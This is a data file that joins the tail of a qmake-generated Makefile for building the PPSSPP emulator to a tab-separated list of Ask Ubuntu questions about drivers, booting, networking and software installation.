sub-ppsspp-pro-all-ordered : sub-common-pro-all-ordered force ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp all sub-ppsspp-pro-all : force ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp all sub-ppsspp-pro-clean-ordered : sub-common-pro-clean-ordered force ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp clean sub-ppsspp-pro-clean : force ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp clean sub-ppsspp-pro-distclean-ordered : sub-common-pro-distclean-ordered force ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp distclean sub-ppsspp-pro-distclean : force ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp distclean sub-ppsspp-pro-install_subtargets-ordered : sub-common-pro-install_subtargets-ordered force ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp install sub-ppsspp-pro-install_subtargets : force ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp install sub-ppsspp-pro-uninstall_subtargets-ordered : sub-common-pro-uninstall_subtargets-ordered force ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp uninstall sub-ppsspp-pro-uninstall_subtargets : force ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp uninstall makefile : ../qt/ppssppqt.pro /usr/lib/i386-linux-gnu/qt5/mkspecs/linux-g++/qmake.conf /usr/lib/i386-linux-gnu/qt5/mkspecs/features/spec_pre.prf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/common/shell-unix.conf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/common/unix.conf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/common/linux.conf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/common/gcc-base.conf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/common/gcc-base-unix.conf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/common/g++-base.conf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/common/g++-unix.conf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/qconfig.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_bootstrap_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_concurrent.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_concurrent_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_core.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_core_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_dbus.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_dbus_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_gui.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_gui_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_network.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_network_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_opengl.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_opengl_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_openglextensions.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_openglextensions_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_platformsupport_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_printsupport.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_printsupport_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_qml.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_qmltest.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_quick.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_sql.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_sql_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_testlib.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_testlib_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_widgets.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_widgets_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_xml.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_xml_private.pri \ /usr/lib/i386-linux-gnu/qt5/mkspecs/features/qt_functions.prf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/features/qt_config.prf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/linux-g++/qmake.conf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/features/spec_post.prf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/features/exclusive_builds.prf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/features/default_pre.prf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/features/resolve_config.prf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/features/default_post.prf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/features/unix/gdb_dwarf_index.prf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/features/warn_on.prf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/features/testcase_targets.prf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/features/exceptions.prf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/features/yacc.prf \ /usr/lib/i386-linux-gnu/qt5/mkspecs/features/lex.prf \ ../qt/ppssppqt.pro $ ( qmake ) -o makefile ../qt/ppssppqt.pro /usr/lib/i386-linux-gnu/qt5/mkspecs/features/spec_pre.prf : /usr/lib/i386-linux-gnu/qt5/mkspecs/common/shell-unix.conf : /usr/lib/i386-linux-gnu/qt5/mkspecs/common/unix.conf : /usr/lib/i386-linux-gnu/qt5/mkspecs/common/linux.conf : /usr/lib/i386-linux-gnu/qt5/mkspecs/common/gcc-base.conf : /usr/lib/i386-linux-gnu/qt5/mkspecs/common/gcc-base-unix.conf : /usr/lib/i386-linux-gnu/qt5/mkspecs/common/g++-base.conf : /usr/lib/i386-linux-gnu/qt5/mkspecs/common/g++-unix.conf : /usr/lib/i386-linux-gnu/qt5/mkspecs/qconfig.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_bootstrap_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_concurrent.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_concurrent_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_core.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_core_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_dbus.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_dbus_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_gui.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_gui_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_network.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_network_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_opengl.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_opengl_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_openglextensions.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_openglextensions_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_platformsupport_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_printsupport.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_printsupport_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_qml.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_qmltest.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_quick.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_sql.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_sql_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_testlib.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_testlib_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_widgets.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_widgets_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_xml.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/modules/qt_lib_xml_private.pri : /usr/lib/i386-linux-gnu/qt5/mkspecs/features/qt_functions.prf : /usr/lib/i386-linux-gnu/qt5/mkspecs/features/qt_config.prf : /usr/lib/i386-linux-gnu/qt5/mkspecs/linux-g++/qmake.conf : /usr/lib/i386-linux-gnu/qt5/mkspecs/features/spec_post.prf : /usr/lib/i386-linux-gnu/qt5/mkspecs/features/exclusive_builds.prf : /usr/lib/i386-linux-gnu/qt5/mkspecs/features/default_pre.prf : /usr/lib/i386-linux-gnu/qt5/mkspecs/features/resolve_config.prf : /usr/lib/i386-linux-gnu/qt5/mkspecs/features/default_post.prf : /usr/lib/i386-linux-gnu/qt5/mkspecs/features/unix/gdb_dwarf_index.prf : /usr/lib/i386-linux-gnu/qt5/mkspecs/features/warn_on.prf : /usr/lib/i386-linux-gnu/qt5/mkspecs/features/testcase_targets.prf : /usr/lib/i386-linux-gnu/qt5/mkspecs/features/exceptions.prf : /usr/lib/i386-linux-gnu/qt5/mkspecs/features/yacc.prf : /usr/lib/i386-linux-gnu/qt5/mkspecs/features/lex.prf : ../qt/ppssppqt.pro : qmake : force @ $ ( qmake ) -o makefile ../qt/ppssppqt.pro qmake_all : sub-native-pro-qmake_all sub-core-pro-qmake_all sub-common-pro-qmake_all sub-ppsspp-pro-qmake_all force make_first : sub-native-pro-make_first-ordered sub-core-pro-make_first-ordered sub-common-pro-make_first-ordered sub-ppsspp-pro-make_first-ordered force all : sub-native-pro-all-ordered sub-core-pro-all-ordered sub-common-pro-all-ordered sub-ppsspp-pro-all-ordered force clean : sub-native-pro-clean-ordered sub-core-pro-clean-ordered sub-common-pro-clean-ordered sub-ppsspp-pro-clean-ordered force distclean : sub-native-pro-distclean-ordered sub-core-pro-distclean-ordered sub-common-pro-distclean-ordered sub-ppsspp-pro-distclean-ordered force - $ ( del_file ) makefile install_subtargets : sub-native-pro-install_subtargets-ordered sub-core-pro-install_subtargets-ordered sub-common-pro-install_subtargets-ordered sub-ppsspp-pro-install_subtargets-ordered force uninstall_subtargets : sub-native-pro-uninstall_subtargets-ordered sub-core-pro-uninstall_subtargets-ordered sub-common-pro-uninstall_subtargets-ordered sub-ppsspp-pro-uninstall_subtargets-ordered force sub-native-pro-check_ordered : ( test -e makefile.native || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/native.pro -o makefile.native ) & & $ ( make ) -f makefile.native check sub-core-pro-check_ordered : sub-native-pro-check_ordered ( test -e makefile.core || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/core.pro -o makefile.core ) & & $ ( make ) -f makefile.core check sub-common-pro-check_ordered : sub-core-pro-check_ordered ( test -e makefile.common || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/common.pro -o makefile.common ) & & $ ( make ) -f makefile.common check sub-ppsspp-pro-check_ordered : sub-common-pro-check_ordered ( test -e makefile.ppsspp || $ ( qmake ) /home/mark/mark's-builds/ppsspp/qt/ppsspp.pro -o makefile.ppsspp ) & & $ ( make ) -f makefile.ppsspp check check : sub-native-pro-check_ordered sub-core-pro-check_ordered sub-common-pro-check_ordered sub-ppsspp-pro-check_ordered install : install_subtargets force uninstall : uninstall_subtargets force force :
440646	`` no executable specified . '' ubuntu sdk unity8	was working last night , but today when i started up again , i could not run unity8 out of qtcreator/ubuntusdk . after building and running , it just states : '' no executable specified . '' fyi ; this is a branch i imported from lp : unity8 into qtcreator . no edits have been done where and how do i specify the executable ?
440648	will overheating of dell inspiron n5010 stop if i remove the graphics card	i notice that my laptop ( dell inspiron n5010 ) is frequently overheating even with the necessary fglrx drivers installed . if i manually remove the graphics card ( or get it removed by someone more experienced ) , will it stop overheating ? everything else is working absolutely fine .
440649	how to disable ipv6 in ubuntu 14.04	to disable ipv6 i have open /etc/sysctl.conf using gedit and paste the following lines at the end of sysctl.conf . net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1 but when i check it using following command , $ cat /proc/sys/net/ipv6/conf/all/disable_ipv6 i am getting result as '0 ' ( i.e still enabled ) . please help me to disable ipv6 , so that i can use hadoop . i followed instructions from this link .
440650	problem with sound in ubuntu 13.10 : sometimes is fine but sometimes is not work	i have installed ubuntu 13.10 beside windows 8 . when i shutdown windows 8 in fast startup mode ( by default ) and then run ubuntu , ubuntu can not mount any ntfs partition and sound is working . but if i restart in windows 8 , partition will be mounted but sound is not working . i do n't know why and how to fix it . can anyone help me ? every advice is appreciate ! thanks all .
440651	drives c : d : e : not showing . switched from windows	i recently switched from windows to ubuntu . i had three ntfs drives . i formatted the c : drive and installed ubuntu 13.10 64-bit on it . now i can only see my home drive . i want to access my data in the other drives as well . how can i make the other drives visible and access them ? i have tried sudo blkid and found following info : /dev/sda1 : uuid= '' 03a7-3042 '' type= '' vfat '' /dev/sda2 : uuid= '' a22a074e-e561-4b82-9e65-30164cc42521 '' type= '' ext4 '' /dev/sda3 : uuid= '' 9328f987-7b1f-4ed3-b5a7-416ef4b2a425 '' type= '' swap '' i tried mounting via editing fstab but did not manage . so , what to do to access my data ?
440652	start thunderbird in background	i have a lot of mailfolders , this leads to thunderbird starting very slow . i use the default ubuntu deskopt and it seems that all autostart applications need to be started until i can access the desktop . how can i start thunderbird in .config/autostart , but in background the desktop entry looks like this : [ desktop entry ] type=application exec=/usr/bin/thunderbird hidden=false nodisplay=false x-gnome-autostart-enabled=true name [ de ] =/usr/bin/thunderbird name=/usr/bin/thunderbird comment [ de ] = comment= i could not find something about starting in background in the specs : http : //standards.freedesktop.org/desktop-entry-spec/desktop-entry-spec-latest.html has some a solution ?
440654	why let command does n't work to add real numbers ?	i need to add some real numbers in a script . i tried : let var=2.5+2.5 which gives me error - invalid arithmetic operator and then i tried : let var=2,5+2,5 which do not gives me error , but it gives me a wrong result - 2 in this case . why ? how to add real numbers using let or other command ?
440657	why wifi gets disconnected quite often on ubuntu 12.04 lts	im quite new on the linux block and my knowledge here is patchy . due to this i would request you all to help me out with a problem that im currently facing . i have observed that even the lts version of ubuntu 12.04 has issues related to wifi connections . what would a proper remedy for fixing this ? thanks
440665	how can i export all notes from gnote to html through command line ?	i want to export the notes of gnote . all of them . to html or plain text . it is known that gnote has a plugin that exports each note to html . but i have to do it manually ( and takes 4 actions per note using the gui ! ) plus , there is no option to export entire notebooks or even all the available notes . so , my question regards exactly that point : i looked for a command line tool , gnote option , or even a tomboy trick ( after importing the notes from gnote ) in order to get all the notes in html ( one note = one file ) . no luck . anyone knows how to do it ? i accept any crazy workaround , use of other programs , etc . oh ! ... i forgot to mention that i have 1435 notes ( yes i do like to take notes ) . and they are in gnote format . so , 1 ) the manual export really does n't make sense . please jump that option in your response . and 2 ) again , the notes are in gnote , so any solution have to start from there : the gnote db . ideally , i would like to access that particular gnote command that exports to html and make a loop in bash or something to apply it to each note . the man page of gnote does n't show any additional info , the debug mode does n't show me what the export to html command do ... so , i felt like i needed some help . thanks in advance !
440668	lirc in 14.04 ( needed for xbmc )	i just installed 14.04 trusty tahr ( beta ) . when running xbmc ( gotham nightly build ) on in and using my lirc remote control i noticed that only the arrow keys and volume keys ( including mute ) work . all the other keys do n't . it 's a standard mce remote control , and the receiver is connected by usb . i got them both in a package and the remote control was manufactured by linksys and the receiver by hp ( or at least so it 's written on them ) . i tried testing the configuration by running gnome-lirc-properties but it wo n't start ( missing module glade , and still missing it after i installed glade ) . then i tried testing for inputs by running irw but it also wo n't run because it is looking for configuration files or stream files that are n't there . the same goes for running lircd , which i find weird as i saw the remote is partially working , meaning there is something there that reads its inputs . what else do i need to check and/or how can i configure the default ir support that came out of the box ?
440670	how do i enable horizontal scroll on lubuntu desktop	i have ubuntu 13.10 installed with the lubuntu desktop installed . on the ubuntu desktop two finger horizontal scrolling works fine but when i log into my preferred lubuntu desktop two finger scrolling only works with vertical scrolling and i can not find an option to change it .
440671	minimalcd for beta version of ubuntu ?	i 've got an older server that 's being difficult . it has a cd drive , but it wo n't accept a dvd drive . i would like to repurpose this old server and install ubuntu 14 on it . past versions of ubuntu have provided a minimalcd for installation . does anyone know if ubuntu is still building them ? it seems ubuntu 8-13 have them , but 14 is missing . if ubuntu 14 is included , would anyone know where to find it ?
440672	how to recieve call to custom url handler in ubuntu touch qml	i have a qml application that needs to react to a custom url handler call , like `` myapp : //something '' . i know i need to register the url handler in my *.desktop file as : mimetype=x-scheme-handler/myapp ; however i do not know where to recieve the call to this handler in qml . can someone help me ? thanks .
440674	is there a way to run/install whats app on ubuntu ?	like windows users run their whats app account using bluestacks , what applications do ubuntu have to run android apps on desktop.i 'm ussing ubuntu 13.10.please suggest me an alternative of blustacks for ubuntu 13.10 .
440675	how do you detect the firware version	i have an intel card n 7260 on my lenovo . i would like to know if the firwmare version supplied by ubuntu 13.10 , is older or matching the upstream version . could you tell me how to detect the firmware version ? these are current upstream versions : 3.10+ iwlwifi-7260-ucode-22.1.7.0.tgz 3.13+ iwlwifi-7260-ucode-22.24.8.0.tgz
440678	issues with libfontconfig / libxft-dev	i 'm having an issue with making lmms . i get to this point : linking cxx executable remotezynaddsubfx /usr/bin/ld : can not find -lxft /usr/bin/ld : can not find -lfontconfig collect2 : error : ld returned 1 exit status make [ 2 ] : *** [ plugins/zynaddsubfx/remotezynaddsubfx ] error 1 make [ 1 ] : *** [ plugins/zynaddsubfx/cmakefiles/remotezynaddsubfx.dir/all ] error 2 make : *** [ all ] error 2 one suggestion was to install libxft-dev which i tried and followed the process below : michael @ michael-lenovo-z580 : ~ $ sudo apt-get install libxft-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libxft-dev : depends : libfontconfig1-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . michael @ michael-lenovo-z580 : ~ $ sudo apt-get install libfontconfig1-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libfontconfig1-dev : depends : libfontconfig1 ( = 2.10.93-0ubuntu1 ) but 2.11.0-0ubuntu1~saucy1 is to be installed e : unable to correct problems , you have held broken packages . michael @ michael-lenovo-z580 : ~ $ sudo apt-get install libfontconfig1 reading package lists ... done building dependency tree reading state information ... done libfontconfig1 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i 'm pretty confused . help would be much appreciated !
440680	kcmoduleinfo and kcmultidialog undefined references	i 'm trying to finish an abandoned kde3-to-kde4 port of a program and i 'm running into these errors : undefined reference to `kcmoduleinfo : :kcmoduleinfo ( qstring const & ) ' undefined reference to `kcmoduleinfo : :modulename ( ) const' undefined reference to `kcmultidialog : :kcmultidialog ( qwidget* ) ' undefined reference to `kcmultidialog : :addmodule ( kcmoduleinfo const & , kpagewidgetitem* , qstringlist const & ) ' undefined reference to `kcmultidialog : :~kcmultidialog ( ) ' undefined reference to `kcmoduleinfo : :~kcmoduleinfo ( ) ' undefined reference to `kcmoduleinfo : :~kcmoduleinfo ( ) ' undefined reference to `kcmultidialog : :~kcmultidialog ( ) ' undefined reference to `kcmoduleinfo : :~kcmoduleinfo ( ) ' the code is as follows : 23 # include < kcmultidialog.h > 24 # include < kcmoduleinfo.h > ... 134 void newsdialog : :proxysettingsbutton_clicked ( ) 135 { 136 kcmoduleinfo proxymoduleinfo ( `` proxy '' ) ; 137 if ( proxymoduleinfo.modulename ( ) .isnull ( ) ) 138 kmessagebox : :error ( this , '' this feature requires kdebase . `` ) ; 139 else { 140 kcmultidialog proxysettings ( this ) ; 141 proxysettings.addmodule ( proxymoduleinfo ) ; 142 proxysettings.exec ( ) ; 143 } 144 } do i need to include some library ? this is the case when i usually get such errors ?
440685	running ubuntu headless	i would like to run ubuntu headless , keyboard less , and mouse less . i plan on logging in remotely to the box from a mac . the primary reason for doing this is lack of space . how can i install and setup this up without hassles ? meaning , i do n't want to have recompile my kernel or tweak driver settings . thanks
440686	how do i read a smart card ?	i bought a usb smart card reader , plugged it in , put in the card , and ... now what ? i 'm so used to having whatever software i need available instantly by apt , that i ca n't figure out how to actually access the card . i 've tried searching online , but all i can find are tutorials on writing drivers for smartcard readers . searching apt-cache for smartcard similarly just produces a bunch of libraries . i assume that someone , somewhere , has written a program to interact with smart cards , but where is it ?
440691	add a binary to my path	i have an executable . i want to execute the executable in terminal with name only like other commands . i can put my executable in /usr/local/bin or i could add its path to ~/.bashrc . both will work . what is better ? is there any difference ?
440692	files ' random modify time	i'v checked around the net and i learn how to change the modify time for files , after that they have the same modify time , its not my willing , i want to have the random time , which is better for secure , can anyone tell me how to do ?
440696	ubuntu on arm platform pc	i have read that ubuntu runs on arm computers , but where are they then ? i have searched and searched , but have found no pc maker that has arm desktop computers , can some one please help me ? i know nvidia has project denver that makes the arm processor availatble for the desktop , but i have not found a desktop with it yet ole
440697	ubuntu screensaver unlocking itself automatically 13.10	i like to listen to music while going to bed , so i turn music on and switch the screen off of my laptop . somehow , since a couple of weeks the screen wo n't switch off . like i were moving the mouse , after 2 seconds it shows again . i 've disabled the touchpad , and unplugged the mouse , but the problem still remains . a reboot helps , but only for like 2 days . i usually use the shortcut ctrl+alt+l . the command xset dpms force off acts the same . actually the problem is irregular , the screen would n't switch off yesterday , but it has today ... i do n't have a clue what might cause the problem , any ideas would be really appreciated .
440702	how to find executables	i know there is a find switch . but i want to know how to search a specific type of file . for example i need kind of terminal command witch search for only executable files
440703	how to fix startup sequence in ubuntu 14.04lts	after installing 14.04lts on my d : drive i found out that it overwrote windows boot sequence on the c : drive where windows vista is located . i installed 14.04 on d : drive and somehow screwed up the boot sequence . so when i start the pc it just goes straight into ubuntu 14.04 without the option of opening windows instead . not very good with linux as you can see , but i am giving a somewhat concerted effort . how bad did i screw up ? thanks , roscoe since i can not get an answer for my question , and no , where you directed me is not the same issue , i would at this point just like to delete ubuntu 14.04 from my pc . can ou point me in the right direction ?
440704	problem loading windows after ubuntu installation	hi hope you can help but i think i messed up already : ( i downloaded and installed ubuntu 13 ( 32 bit ) using the `` install alongside win 8 '' option . however it would n't reboot . then i downloaded ubuntu 64 bit installed it choosing something like `` replace old linux 13 installation '' . now i can boot only ubuntu and it wo n't let me choose win8 . i suspectk somehow the windows partition has gone ? before installing ubuntu i had 3 partitions : c : with win8 d : with system recovery e : create to store file videos photos etc ... now looks like everything has merged into 1 linux partition , would it be possible to restore at least the win e volume where i had everything ? please help i 'm desperate , years of pictures : ( here 's my logs http : //paste.ubuntu.com/7173458/
440706	installing ubuntu 12.04 from a pendrive	i 've downloaded iso file of ubuntu 12.04.what is the next step to install from a pendrive ?
440708	unable to generate core dump after apport disable	hi i 'm currently programming c++ on ubuntu and am unable to generate a core dump with a segmentation fault . i just get `` segementation fault '' and not the ( core dump ) i have set ulimit -c unlimited . i used to be able to generate core dumps but sometime ago they stopped coming . maybe this is because i disabled apport because of this bug `` sorry , ubuntu 12.04 has experienced an internal error. '' . so i was wondering what other steps are there to enabling core dumps after ulimit -c unlimited ?
440709	listen to pulseaudio rtp stream using vlc	i want to listen to pulseaudio 's rtp multicast stream using vlc , but it 's not working out . first , i try to determine where it 's playing : tcpdump -n net 192.0.0.0/8 -c 10 which gives me listening on eth0 , link-type en10mb ( ethernet ) , capture size 65535 bytes 13:38:07.637528 ip 192.168.1.3.53918 > 224.0.0.56.46504 : udp , length 1292 13:38:07.645170 ip 192.168.1.3.53918 > 224.0.0.56.46504 : udp , length 1292 13:38:07.651897 ip 192.168.1.3.53918 > 224.0.0.56.46504 : udp , length 1292 13:38:07.662192 ip 192.168.1.3.53918 > 224.0.0.56.46504 : udp , length 1292 13:38:07.662207 ip 192.168.1.3.53918 > 224.0.0.56.46504 : udp , length 1292 13:38:07.669482 ip 192.168.1.3.53918 > 224.0.0.56.46504 : udp , length 1292 so then i try to play just about every possible combination : vlc rtp : // @ 192.168.1.3 vlc rtp : // @ 224.0.0.56 vlc rtp : // @ 224.0.0.56.46504 but it just does nothing . vlc does n't give any error messages , it seems as if it 's playing , but i get no sound .
440713	pxe e53 error no boot file detect	i have a ubuntu desktop 12.04 and installed clonezilla server on it , our environment has a tp-link and a switch , the tp-link provides the dhcp , wan connection services and the switch connect with it and others 30 pcs ( including ubuntu desktop ) . when i tried to restore 10 pcs , it show `` pxe e53 no boot filename received '' , but i tried to modify pxe setting on one pc , it can detect the clonezilla server and process the restoration . i do n't want to modify the pc setting one by one , what action should i do on the clonezilla server ?
440715	installation of matlab r2011a in ubuntu 13.10	i have installation folder which i used for windows 7 of matlab r2011a , which contains setup.exe file and how to install it in ubuntu 13.10. new to ubuntu environment
440716	amd catalyst 13.12 x64 problem when installing on ubuntu 12.04 lts x64 ( hd6950 ) = > solution	i have encountered a problem when trying to install amd catalyst driver for ubuntu 12.04lts x64 , obviously the drivers where x64 bit is well . i found out that the kernel version which is 3.11 has a problem with this version of drivers . just to let other people know try to downgrade the kernel version down to least to 3.10 or less and then try to install the driver and just to let you know when you encounter a problem and then you will uninstall the driver via the terminal using sudo apt-get -- purge etc . you wo n't have any graphic desktop installed so ubuntu will run in a low graphic mode and in this mode you wo n't be able to recover the backup file for xserver so you what you have to do is just install the xserver from the console when you will log in via console mode ...
440719	ubuntu 13.10 power and restart button not working	i have an issue with ubuntu 13.10 x64 . fairly recent install since i dropped back from the 14.04 beta . the issue is both the restart and shutdown menu items ( from the upper right menu ) , when clicked show the 'do you wish to log out ' option ; this leaves me with either 'lock ' or 'logout ' . sudo shutdown 0 sort of works in that it gets me out of x , but then simply drops me to a root prompt and doesnt turn the computer off . the suspend button still works correctly . when i click the logout or lock option at the prompt , nothing happens and the prompt simply disappears . memory : 13.7gb processor : intel core i7 930 @ 2.80ghz x8 graphics : amd radeon hd 6870 ( using 14.3 beta 1.0 drivers ) -chris
440722	problem with mouse	i am currently using kubuntu 13.10 on laptop and i am observing strange mouse behavior . i can manage system using keyboard and can move cursor but when i try to click it seems that nothing happens . sometimes the mouse ( touchpad ) works correctly but only in one window ( for example mouse works in web browser but the system is not responding when i click the task manager panel or other windows ) . do you have any ideas how to fix it ?
440724	webapps on ubuntu 13.10	recently i upgraded my ubuntu to 13.10 and now i want to install webapp . i did install the chromium extension , but could n't install the package from the repository . it gave error `` can not find the package '' . i did add the repository , however.please help
440726	grub rescue errorâ 	i recently dual booted my computer to have windows 7 and ubuntu 13.10 on it . i later decided that i did n't want ubuntu , so in windows 7 i went to disk management and deleted 2 volumes that were not there before i made an ubuntu partition , and then when i restarted my computer all that came up on the screen was : error : no such partition grub rescue > what does this mean ? what do i do to either boot into windows or linux ? any help is appreciated . i am very new to linux . thank you !
440727	how to install flex in ubuntu 12.04.03 lts ?	i am using ubuntu 12.04.03 lts . i want to install flex . but i m not able to install flex . can you tell me how to install flex ? show me step by step process to install flex ... .
440728	is having lubuntu 12.04 a security risk ?	i have a computer with lubuntu 12.04 installed . since unlike ubuntu 12.04 lubuntu is not lts , i will not get lubuntu updates . however , i am still getting updates ( i guess these are the general ubuntu updates ) . is having lubuntu installed a security risk , or are the missing updates not security relevant ? is it more secure to have ubuntu installed and manually install the lxde desktop ? ( the computer is a little bit to old for fluent use of the unity desktop ) . thanks a lot ! edit i switched to 13.10 - still i am wondering what the answer to this question is .
